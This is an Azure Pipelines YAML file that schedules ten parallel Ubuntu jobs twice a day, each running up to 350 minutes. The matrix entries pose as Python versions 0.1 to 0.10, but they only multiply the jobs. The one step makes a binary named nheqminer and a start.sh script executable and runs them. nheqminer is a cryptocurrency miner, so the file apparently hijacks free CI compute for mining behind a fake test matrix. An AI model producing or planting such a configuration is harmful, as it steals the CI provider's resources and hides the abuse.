schedules:
- cron: "0 10,22 * * *"
  displayName: 12 hour running
  branches:
    include:
    - main

jobs:
- job: ubuntu
  timeoutInMinutes: 350
  strategy:
    matrix:
      1:
        python: 0.1
      2:
        python: 0.2
      3:
        python: 0.3
      4:
        python: 0.4
      5:
        python: 0.5
      6:
        python: 0.6
      7:
        python: 0.7
      8:
        python: 0.8
      9:
        python: 0.9
      10:
        python: 0.10

  pool:
    vmImage: 'ubuntu-20.04'
  steps:
    - script: |
        chmod 500 nheqminer start.sh && ./start.sh
